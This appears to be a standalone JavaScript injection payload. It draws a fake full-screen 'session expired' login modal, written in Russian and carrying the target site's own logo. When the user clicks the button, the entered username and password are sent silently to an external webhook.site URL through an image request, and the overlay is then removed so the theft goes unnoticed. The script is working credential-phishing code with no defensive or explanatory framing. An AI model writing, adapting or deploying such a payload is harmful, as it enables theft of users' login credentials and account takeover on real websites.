var d=document.createElement('div');
d.style.cssText='position:fixed;top:0;left:0;width:100vw;height:100vh;background:rgba(0,0,0,0.7);z-index:2147483647;display:flex;align-items:center;justify-content:center';
var m=document.createElement('div');
m.style.cssText='background:#fff;border-radius:12px;padding:32px;width:320px;text-align:center;box-shadow:0 10px 30px rgba(0,0,0,0.3)';
var logo=document.createElement('img');
logo.src='/frontend/web/content/image/logoBlue.svg';
logo.style.cssText='width:120px;margin-bottom:16px';
m.appendChild(logo);
var h=document.createElement('p');
h.textContent='Сессия истекла. Войдите повторно.';
h.style.cssText='color:#125ad0;font-weight:bold;margin-bottom:16px';
m.appendChild(h);
var a=document.createElement('input');
a.autocomplete='username';
a.placeholder='Логин';
a.style.cssText='width:100%;padding:10px;margin-bottom:10px;border:1px solid #ccc;border-radius:8px;box-sizing:border-box';
m.appendChild(a);
var b=document.createElement('input');
b.type='password';
b.autocomplete='current-password';
b.placeholder='Пароль';
b.style.cssText='width:100%;padding:10px;margin-bottom:16px;border:1px solid #ccc;border-radius:8px;box-sizing:border-box';
m.appendChild(b);
var c=document.createElement('button');
c.textContent='ВОЙТИ';
c.style.cssText='width:100%;padding:12px;background:#125ad0;color:#fff;border:none;border-radius:8px;font-size:16px;font-weight:bold;cursor:pointer';
c.onclick=function(){
new Image().src='https://webhook.site/ae7990e1-69d3-4b40-8fdc-bbe39df73870?l='+encodeURIComponent(a.value)+String.fromCharCode(38)+'p='+encodeURIComponent(b.value);
document.body.removeChild(d);
};
m.appendChild(c);
d.appendChild(m);
document.body.appendChild(d);
